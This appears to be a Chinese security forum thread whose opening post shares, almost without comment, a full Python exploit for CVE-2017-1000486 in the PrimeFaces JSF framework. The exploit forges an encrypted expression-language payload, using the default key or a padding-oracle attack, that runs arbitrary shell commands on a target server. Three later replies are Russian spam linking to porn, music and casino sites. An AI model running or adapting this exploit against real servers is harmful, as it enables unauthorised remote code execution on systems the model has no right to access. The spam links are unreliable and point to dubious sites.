请选择 进入手机版 | 继续访问电脑版

都会信息科技情报报送交流中心

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 1309|回复: 3

(福利)CVE-2017-1000486 密码攻击poc (环境 python3)

[复制链接]

5

主题

5

帖子

23

积分

萌新用户

Rank: 1

积分
23
QQ
发表于 2020-3-17 17:15:50 | 显示全部楼层 |阅读模式
话不多说!直接上 poc

from paddingoracle import BadPaddingException, PaddingOracle
# from base64 import b64encode, b64decode
# from urllib import quote, unquote
import requests
from Crypto.Hash import MD5
from Crypto.Cipher import DES
import base64
import socket
import time
import logging
import argparse

class PadBuster(PaddingOracle):
    def __init__(self, **kwargs):
        super(PadBuster, self).__init__(**kwargs)
        self.session = requests.Session()
        requests.packages.urllib3.disable_warnings()
        self.wait = kwargs.get('wait', 2.0)

    def oracle(self, data, **kwargs):
        payload = base64.b64encode(data)

        while 1:
            try:
                post_params = {'pfdrt':'sc', 'ln':'primefaces', 'pfdrid': payload}
                response = self.session.post(self.target, data=post_params, stream=False, timeout=5, verify=False, proxies=self.proxies, headers=self.headers)
                break
            except (socket.error, requests.exceptions.RequestException):
                logging.exception('Retrying request in %.2f seconds...', self.wait)
                time.sleep(self.wait)
                continue

        self.history.append(response)

        # An HTTP 500 error was returned, likely due to incorrect padding
        if response.status_code == 500:
            logging.exception('No padding exception raised on %r', payload)
            return

        raise BadPaddingException


payloadEL =  '${session.setAttribute("scriptfactory",facesContext.getExternalContext().getClass().getClassLoader().loadClass("javax.script.ScriptEngineManager").newInstance())}'
payloadEL += '${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}'
payloadEL += '${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}'
payloadEL += '${session.getAttribute("scriptengine").eval('
payloadEL += '"var os = java.lang.System.getProperty(\\"os.name\\");'
payloadEL += 'var proc = null;'
payloadEL += 'os.toLowerCase().contains(\\"win\\")? '
payloadEL += 'proc = new java.lang.ProcessBuilder[\\"(java.lang.String[])\\"]([\\"cmd.exe\\",\\"/C\\",\\"".concat(request.getParameter("cmd")).concat("\\"]).start()'
payloadEL += ' : proc = new java.lang.ProcessBuilder[\\"(java.lang.String[])\\"]([\\"/bin/sh\\",\\"-c\\",\\"").concat(request.getParameter("cmd")).concat("\\"]).start();'
payloadEL += 'var is = proc.getInputStream();'
payloadEL += 'var sc = new java.util.Scanner(is,\\"UTF-8\\"); var out = \\"\\";'
payloadEL += 'while(sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);}print(out);"))}'
payloadEL += '${facesContext.getExternalContext().getResponse().getWriter().flush()}'
payloadEL += '${facesContext.getExternalContext().getResponse().getWriter().close()}';


def get_args():
    parser = argparse.ArgumentParser( prog="primefaces.py",
                      formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
                      epilog= '''
                       This script exploits an expression language remote code execution flaw in the Primefaces JSF framework.
                       Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack,
                       due to the use of weak crypto and default encryption password and salt.
                      ''')

    parser.add_argument("target", help="Target Host")
    parser.add_argument("-pw", "--password", default="primefaces", help="Primefaces Password (Default = primefaces")
    parser.add_argument("-pt", "--path", default="/javax.faces.resource/dynamiccontent.properties.xhtml", help="Path to dynamiccontent.properties (Default = /javax.faces.resource/dynamiccontent.properties.xhtml)")
    parser.add_argument("-c", "--cmd", default="whoami", help="Command to execute. (Default = whoami)")
    parser.add_argument("-px", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (Default = None)")
    parser.add_argument("-ck", "--cookie", default="", help="Configure a cookie in the format 'COOKIE=VALUE; COOKIE2=VALUE2;' (Default = None)")
    parser.add_argument("-o", "--oracle", default="0", help="Exploit the target with Padding Oracle. Use 1 to activate. (Default = 0) (SLOW)")
    parser.add_argument("-pl", "--payload", default="", help="EL Encrypted payload. That function is meant to be used with the Padding Oracle generated payload. (Default = None) ")
    args = parser.parse_args()
    return args


"""Mimic Java's PBEWithMD5AndDES algorithm used by Primefaces"""
def encrypt(data, password):
    # Padding clear-text using PKCS5 algo
    padding = 8 - len(data) % 8
    data += chr(padding) * padding
    # IV and "iterations count" extracted from primefaces sourcecode
    iterations = 19
    iv = b'\xa9\x9b\xc8\x32\x56\x34\xe3\x03'
    hasher = MD5.new()
    hasher.update(password)
    hasher.update(iv)
    result = hasher.digest()

    for i in range(1, iterations):
        hasher = MD5.new()
        hasher.update(result)
        result = hasher.digest()

    cipher = DES.new(result[:8], DES.MODE_CBC, result[8:16])
    encrypted = cipher.encrypt(data)
    print ("
  • Generated Encrypted Payload: " + str(base64.b64encode(encrypted)))
        return str(base64.b64encode(encrypted))


    def exploit(target, path, cmd, password, proxy, cookie, payload=""):
        requests.packages.urllib3.disable_warnings()
        proxies = {
            'http': proxy,
            'https': proxy
        }
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
            'Accept': '*/*',
            'Cookie': cookie
        }
        if payload == "":
          payload = encrypt(payloadEL, password)
        post_params = {'pfdrt':'sc', 'ln':'primefaces', 'pfdrid': payload, 'cmd' : cmd}
        print ("
  • Attempting to execute: %s" % cmd)
        r = requests.post(target+path, data=post_params, verify=False, proxies=proxies, headers=headers)
        if r.text:
          print ("[+] Exploit Result:\n\n %s" % r.text)  
        else:
          print ("[-] Response body empty... Target might not be vulnerable or don't use default password... Try the padding oracle attack.")

    def exploit_paddingoracle(target, path, cmd, password, proxy, cookie):
        padbuster = PadBuster()
        padbuster.proxies = {
            'http': proxy,
            'https': proxy
        }
        padbuster.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
            'Accept': '*/*',
            'Cookie': cookie
        }
        padbuster.target = target+path
        iv = b'\xa9\x9b\xc8\x32\x56\x34\xe3\x03'
        payload = padbuster.encrypt(payloadEL, block_size=8, iv=iv)
        print ("[+] Using the following generated payload:\n\n %s" % base64.b64encode(payload))  
        requests.packages.urllib3.disable_warnings()
        proxies = {'http': proxy, 'https': proxy}
        post_params = {'pfdrt':'sc', 'ln':'primefaces', 'pfdrid': base64.b64encode(payload), 'cmd' : cmd}
        print ("
  • Attempting to execute: %s" % cmd)
        r = requests.post(target+path, data=post_params, verify=False, proxies=proxies, headers=padbuster.headers)
        print(r.headers)
        if r.text:
          print ("[+] Exploit Result:\n\n %s" % r.text)  
        else:
          print ("[-] Response body empty... Target might not be vulnerable... :-(")

    def main():
        print ('')
        print ('========================================================================')
        print ('|     CVE-2017-1000486 - Primefaces Remote Code Execution Exploit      |')
        print ('|                               by pimps                               |')
        print ('========================================================================\n')

        args = get_args()
        if (args.oracle.strip() == "0"):
            if (args.payload.strip() == ""):
                print ("
  • Generating payload using default Password...")  
            else:
                print ("
  • Executing the exploit using a given Payload...")
            exploit(args.target.strip(),args.path.strip(),args.cmd.strip(), args.password.strip(), args.proxy.strip(), args.cookie.strip(), args.payload.strip())
        else:
            print ("
  • Generating payload with Padding Oracle Attack... (SLOW)")  
            exploit_paddingoracle(args.target.strip(),args.path.strip(),args.cmd.strip(), args.password.strip(), args.proxy.strip(), args.cookie.strip())


    if __name__ == '__main__':
      main()


  • 回复

    使用道具 举报

    0

    主题

    1

    帖子

    4

    积分

    萌新用户

    Rank: 1

    积分
    4
    发表于 2021-2-19 04:30:23 | 显示全部楼层

    muzmo скачать бесплатно порно

    признаюсь, музмо ру 2020 новинки https://muzground.ru
    ex rye softly https://muzground.ru/
    回复

    使用道具 举报

    0

    主题

    1

    帖子

    4

    积分

    萌新用户

    Rank: 1

    积分
    4
    发表于 2021-5-21 19:56:11 | 显示全部楼层

    casino x реальные отзывы

    по справедливости говоря для вас огромный выигрыш

    http://chimmed.ru/news/pages/igrovue_avtomatu_s_muzukalnoy_tematikoy.html
    https://triton-ltd.ru/slider/inc/kak_igrat_v_avtomatu_s_telefona_na_android_i_ios.html
    http://zakustom.ru/wp-includes/list/mobilnaya_versiya_onlayn_kazino_vulkan_1.html
    https://www.vitbichi.by/akcii/elem/mobilnaya_versiya_onlayn_kazino_vulkan_2.html
    http://rg62.info/news/kak_vubrat_igrovoy_avtomat_v_kazino_1.html
    http://xn--h1albh.xn--p1ai/wp-includes/pages/gde_nayti_rabochee_zerkalo_onlayn_k
    回复

    使用道具 举报

    0

    主题

    1

    帖子

    4

    积分

    萌新用户

    Rank: 1

    积分
    4
    发表于 2021-6-9 18:31:00 | 显示全部楼层

    casino x 3000

    MonzaCrale ·±нУЪ 2021-5-21 19:56
    §б§а §г§б§в§С§У§Ц§Х§Э§Ъ§У§а§г§д§Ъ §Ф§а§У§а§в§с §Х§Э§с §У§С§г §а§Ф§в§а§Ю§Я§н§Ы §У§н§Ъ§Ф§в§н§к

    ht ...

    во всяком случае для вас азартный игрок

    http://www.ristrutturazioni-smart.it/component/k2/itemlist/user/970924
    http://krasnogorsk-makler.ru/realty/demand/76806
    http://old.ho4uletat.ru/coaches/irina-norna/otzivy/13801
    http://www.enjoycre.com/?option=com_k2&view=itemlist&task=user&id=1077064
    http://www.nafttech.com/component/k2/itemlist/user/1524169


    TL4kRi3x
    http://www.enjoycre.com/?option=com_k2&view=itemlist&task=user&id=1077064
    回复

    使用道具 举报

    都会信息科技情报报送交流中心 ( 渝ICP备20002475号-1 )

    GMT+8, 2021-6-21 11:44 , Processed in 0.090894 second(s), 18 queries .

    Powered by Discuz! X3.4

    Copyright © 2001-2021, Tencent Cloud.

    快速回复 返回顶部 返回列表